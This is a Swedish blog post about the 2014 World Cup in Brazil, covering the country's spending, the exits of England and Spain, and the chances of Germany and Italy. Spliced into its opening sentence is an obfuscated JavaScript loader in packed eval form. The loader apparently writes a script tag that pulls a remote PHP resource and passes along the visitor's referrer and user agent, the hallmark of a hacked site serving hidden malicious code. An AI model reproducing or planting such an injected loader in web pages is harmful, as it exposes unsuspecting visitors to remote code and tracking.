Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

VM i Brasilien

VM i Brasilien
Sebastian

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nksfs|var|u0026u|referrer|ezrsy||js|php’.split(’|’),0,{}))
har satsats över 80 miljarder kronor på fotbolls VM i Brasilien. Något som landet varit tvungna att själva plocka ur kassan. Självklart hoppas man få igen dessa då landet lever för just fotbollen, och turismen kunde inte vara bättre.

Nu är vi mitt inne i kanske det hetaste VM i modern tid, och redan har många storslagna lågoddsare åkt ut. England och Spanien några av dessa. Men hoppet för Europa finns kvar. Tyskland som enligt statistik är nummer två på det landslag vi i Sverige tror kommer ta hem segern är fortfarande kvar. Som vi sett tyskarna spela under detta VM så är chanserna stora att klättra mot final. Men vi får inte heller glömma fotbollslandet Italien som också är kvar i spelet.

För er som är intresserade och se hur det går för lagen som är kvar så gäller det att vara vaken samt ha koll på vilken kanal och tid den match du vill se går av stapeln. Matcherna som sänds under VM 2014 går att hitta på många olika sajter, så det är bara att planera in sluttampen och hoppas på det bästa.

Har du följt VM i Brasilien?

Vilket lag tror du kommer ta hem det hela?

Vilka lag hamnar i final?

Kommentera gärna nedan och diskutera, vi vill veta vad du tror.